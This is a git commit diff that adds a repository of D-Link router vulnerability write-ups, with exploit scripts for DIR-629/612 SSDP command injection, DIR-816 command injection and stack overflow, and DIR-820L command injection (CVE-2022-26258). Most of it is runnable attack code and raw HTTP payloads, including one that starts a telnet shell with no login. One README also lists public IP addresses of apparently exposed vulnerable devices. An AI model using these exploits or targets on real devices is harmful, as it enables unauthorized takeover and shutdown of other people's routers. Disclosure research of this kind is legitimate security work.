新增TP-LINK

Vuln/Vuln/.gitignore

@@ -0,0 +1,2 @@
+archive/*
+*/.DS_Store

Vuln/Vuln/DIR-629A1/rce_0/README.md

@@ -0,0 +1,61 @@
+# DIR-612
+
+**产品型号**: D-Link DIR-612（硬件版本A1）
+
+**固件版本**: 1.10 B05
+
+**厂家官网**: http://www.dlink.com.cn/
+
+**固件地址**: http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-629
+
+![image-20210317223351729](https://gitee.com/mrskye/Picbed/raw/master/img/20210317223358.png)
+
+## 漏洞信息
+
+漏洞二进制文件：`/htdocs/cgibin`
+
+漏洞函数：`ssdpcgi_main` 
+
+在处理 /ssdpcgi 时，SERVER_ID 的值用于拼接 `%s services %s:%s %s %s &` ，该字符串随后被传入 lxmldbc_system 进行系统调用。由于没有对 SERVER_ID 进行过滤，因此存在注入命令，实现 rce 。
+
+![image-20210317223754651](https://gitee.com/mrskye/Picbed/raw/master/img/20210317223754.png)
+
+## EXP
+
+这个接口是 socket 服务，不能通过 web 访问
+
+```python
+import sys
+import os
+import socket
+from time import sleep
+
+ip = "192.168.0.1"
+port = 1900
+command = "poweroff"
+
+sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM,socket.IPPROTO_UDP)
+sock.setsockopt(socket.IPPROTO_IP,socket.IP_MULTICAST_TTL,2)
+
+payload = "M-SEARCH * HTTP/1.1\n"
+payload += "HOST:"+str(ip)+":"+str(port)+"\n"
+payload += "ST:urn:device:1;{}\n".format(command)
+payload += "MX:2\n"
+payload += 'MAN:"ssdp:discover"'+"\n\n"
+
+sock.sendto(payload,(ip, port))
+```
+
+> 公网机器：
+>
+> http://122.225.206.91:8333/
+>
+> http://112.118.247.147:8080/
+
+## 参考资料
+
+https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-rce-in-ssdpcgi-http-st-cve-2019-20215-en-2e799acb8a73
+
+https://xz.aliyun.com/t/5468#toc-2
+
+https://www.anquanke.com/post/id/94289

Vuln/Vuln/DIR-629A1/rce_0/exp.py

@@ -0,0 +1,25 @@
+import sys
+import os
+import socket
+from time import sleep
+
+ip = "192.168.0.1"
+port = 1900
+command="poweroff"
+
+def config_payload(ip, port,command):
+    header = "M-SEARCH * HTTP/1.1\n"
+    header += "HOST:"+str(ip)+":"+str(port)+"\n"
+    header += "ST:urn:device:1;{}\n".format(command)
+    header += "MX:2\n"
+    header += 'MAN:"ssdp:discover"'+"\n\n"
+    return header
+def send_conexion(ip, port, payload):
+    sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM,socket.IPPROTO_UDP)
+    sock.setsockopt(socket.IPPROTO_IP,socket.IP_MULTICAST_TTL,2)
+    sock.sendto(payload,(ip, port))
+    sock.close()
+
+payload = config_payload(ip, port, command)
+print payload
+# send_conexion(ip, port, payload)

Vuln/Vuln/DIR-816/cmd_injection_0/README.md

@@ -0,0 +1,51 @@
+# D-Link DIR-816 A2 cmd_injection
+
+**Vender**: D-Link
+
+**Firmware version**: 1.10 B05
+
+**Vendor Homepage**: http://www.dlink.com.cn/
+
+**Hardware Link**: http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-816
+
+**Exploit Author**: [SkYe231](mailto:[email protected])
+
+## detail
+
+In the handler of route `/goform/setSysAdm`, the value of parameter `admuser` is used in the construction of command `chpasswd.sh %s %s`, which is later fed to `system`:
+
+![20210310231620](20210310231620.png)
+
+So it could lead to command injection with crafted request.
+
+## POC
+
+> The injection command is `poweroff`. After running POC, the router will **shut down**
+
+```python
+# coding=utf-8
+import requests
+import re
+
+ip = "192.168.0.1"
+cmd = "`poweroff`"
+
+print("[+]Get tokenid")
+
+url = "http://{}/dir_login.asp".format(ip)
+rsp = requests.get(url)
+
+pattern = re.compile(r'name="tokenid"  value="\d+"')
+result = pattern.findall(rsp.text)
+tokenid = result[0][23:33]
+print("[+]tokenid:{}".format(tokenid))
+
+url = "http://{}/goform/setSysAdm".format(ip)
+data = {"admuser": "admin", "admpass": cmd, "tokenid": tokenid}
+try:
+    requests.post(url, data=data, allow_redirects=False, timeout=1)
+except:
+    pass
+print("[+]DIR816: {}".format(cmd))
+```
+

Vuln/Vuln/DIR-816/cmd_injection_0/exp.py

@@ -0,0 +1,24 @@
+# coding=utf-8
+import requests
+import re
+
+ip = "192.168.0.1"
+cmd = "`poweroff`"
+
+print("[+]Get tokenid")
+
+url = "http://{}/dir_login.asp".format(ip)
+rsp = requests.get(url)
+
+pattern = re.compile(r'name="tokenid"  value="\d+"')
+result = pattern.findall(rsp.text)
+tokenid = result[0][23:33]
+print("[+]tokenid:{}".format(tokenid))
+
+url = "http://{}/goform/setSysAdm".format(ip)
+data = {"admuser": "admin", "admpass": cmd, "tokenid": tokenid}
+try:
+    requests.post(url, data=data, allow_redirects=False, timeout=1)
+except:
+    pass
+print("[+]DIR816: {}".format(cmd))

Vuln/Vuln/DIR-816/stack_overflow_0/README.md

@@ -0,0 +1,54 @@
+# D-Link DIR-816 A2 stack_overflow
+
+**Vender**: D-Link
+
+**Firmware version**: 1.10 B05
+
+**Vendor Homepage**: http://www.dlink.com.cn/
+
+**Hardware Link**: http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-816
+
+**Exploit Author**: [SkYe231](mailto:[email protected])
+
+## detail
+
+In the handler of route `/goform/dir_login`, the value of parameter `username` is base64 decoded and the result is saved on the stack:
+
+![20210420002509](20210420002509.png)
+
+However, there's no check on length of the `username` , and a very long input could lead to stack overflow and overwrite the return address.
+
+## POC
+
+> After running POC, the router will **crash**.
+
+```python
+# coding=utf-8
+import requests
+import re
+import base64
+
+ip = "192.168.0.1"
+payload = base64.b64encode('a'*0x150)
+print(len(payload))
+
+print("[+]Get tokenid")
+url = "http://{}/dir_login.asp".format(ip)
+rsp = requests.get(url)
+
+pattern = re.compile(r'name="tokenid"  value="\d+"')
+result = pattern.findall(rsp.text)
+tokenid = result[0].split('value="')[-1].strip('"')
+print("[+]tokenid:{}".format(tokenid))
+
+url = "http://{}/goform/form2userconfig.cgi".format(ip)
+data = {"username": payload, "newpass": '', "tokenid": tokenid}
+try:
+    requests.post(url, data=data, allow_redirects=False, timeout=1)
+except:
+    pass
+print("[+]DIR816 Crash")
+```
+
+<video src="验证视频.mp4"></video>
+

Vuln/Vuln/DIR-816/stack_overflow_0/README_zh.md

@@ -0,0 +1,54 @@
+## 固件信息
+
+产品型号：DIR-816 750M11AC
+
+设备硬件版本：A2
+
+固件版本：1.10B05
+
+固件下载地址：http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-816
+
+![image-20210310230637330](https://gitee.com/mrskye/Picbed/raw/master/img/20210310230644.png)
+
+## 漏洞信息
+
+漏洞URL：`http://192.168.0.1/goform/dir_login.asp` 
+
+二进制文件：`squashfs-root/bin/goahead`
+
+大致漏洞地址：`0x004567D4`
+
+形参 Username 通过 websGetVar 从数据包中直接获取，长度为我们所控制。经过 websDecode64 进行解码后放入局部变量 v8 中，造成栈溢出。
+
+![image-20210420002501338](https://gitee.com/mrskye/Picbed/raw/master/img/20210420002509.png)
+
+## POC
+
+```python
+# coding=utf-8
+import requests
+import re
+import base64
+
+ip = "192.168.0.1"
+payload = base64.b64encode('a'*0x150)
+print(len(payload))
+
+print("[+]Get tokenid")
+url = "http://{}/dir_login.asp".format(ip)
+rsp = requests.get(url)
+
+pattern = re.compile(r'name="tokenid"  value="\d+"')
+result = pattern.findall(rsp.text)
+tokenid = result[0].split('value="')[-1].strip('"')
+print("[+]tokenid:{}".format(tokenid))
+
+url = "http://{}/goform/form2userconfig.cgi".format(ip)
+data = {"username": payload, "newpass": '', "tokenid": tokenid}
+try:
+    requests.post(url, data=data, allow_redirects=False, timeout=1)
+except:
+    pass
+print("[+]DIR816 已崩溃")
+```
+

Vuln/Vuln/DIR-816/stack_overflow_0/poc.py

@@ -0,0 +1,26 @@
+# coding=utf-8
+import requests
+import re
+import base64
+
+ip = "192.168.0.1"
+payload = base64.b64encode('a'*0x150)
+print(len(payload))
+
+print("[+]Get tokenid")
+url = "http://{}/dir_login.asp".format(ip)
+rsp = requests.get(url)
+
+pattern = re.compile(r'name="tokenid"  value="\d+"')
+result = pattern.findall(rsp.text)
+tokenid = result[0].split('value="')[-1].strip('"')
+print("[+]tokenid:{}".format(tokenid))
+
+url = "http://{}/goform/form2userconfig.cgi".format(ip)
+data = {"username": payload, "newpass": '', "tokenid": tokenid}
+try:
+    requests.post(url, data=data, allow_redirects=False, timeout=1)
+except:
+    pass
+print("[+]DIR816 Crash")
+

Vuln/Vuln/DIR-820L/command_execution_0/README.md

@@ -0,0 +1,52 @@
+# D-Link DIR-820L command_execution
+
+**CVE ID**: CVE-2022-26258
+
+**Vender**: D-Link
+
+**Vendor Homepage**: http://www.dlink.com.cn/
+
+**Affect products**: DIR-820L
+
+**Firmware version**: 1.05 B03
+
+**Hardware Link**: http://www.dlinktw.com.tw/techsupport/download.ashx?file=2663
+
+**Exploit Author**: [SkYe231@Hillstone](mailto:[email protected]), Akast@Hillstone, GD@Hillstone, Amao@Hillstone
+
+## detail
+
+In the handler of route `/lan.asp`, the value of parameter `Device Name` can inject command
+
+![image-20220222165316794](img/image-20220222165316794.png)
+
+Parameters are filtered on both the front-end and the back-end. 
+
+**Grab traffic packets to bypass front-end filtering.** 
+
+**The backend filter function is: `hasInjectionString` (in file `lib/libleopard.so`).The symbol `\n` is not filtered.**
+
+## EXP
+
+Edit the value of `lanHostCfg_DeviceName_1.1.1.0` to the command what you want to inject. Such as:
+
+> lanHostCfg_DeviceName_1.1.1.0=%0atelnetd -l /bin/sh%0a
+
+```html
+POST /get_set.ccp HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
+Accept: application/xml, text/xml, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 768
+Origin: http://192.168.0.1
+Connection: close
+Referer: http://192.168.0.1/lan.asp
+Cookie: hasLogin=1
+
+ccp_act=set&old_ip=192.168.0.1&old_mask=255.255.255.0&new_ip=192.168.0.1&new_mask=255.255.255.0&nextPage=lan.asp&lanHostCfg_IPAddress_1.1.1.0=192.168.0.1&lanHostCfg_SubnetMask_1.1.1.0=255.255.255.0&lanHostCfg_DomainName_1.1.1.0=&lanHostCfg_DNSRelay_1.1.1.0=1&lanHostCfg_DHCPServerEnable_1.1.1.0=1&lanHostCfg_MinAddress_1.1.1.0=192.168.0.100&lanHostCfg_MaxAddress_1.1.1.0=192.168.0.200&lanHostCfg_DHCPLeaseTime_1.1.1.0=1440&lanHostCfg_DeviceName_1.1.1.0=%0atelnetd -l /bin/sh%0a&lanHostCfg_AlwaysBroadcast_1.1.1.0=0&lanHostCfg_NetBIOSAnnouncement_1.1.1.0=0&lanHostCfg_NetBIOSLearn_1.1.1.0=0&lanHostCfg_NetBIOSScope_1.1.1.0=&lanHostCfg_NetBIOSNodeType_1.1.1.0=2&lanHostCfg_PrimaryWINSAddress_1.1.1.0=0.0.0.0&lanHostCfg_SecondaryWINSAddress_1.1.1.0=0.0.0.0&1645537536373=1645537536373
+```
+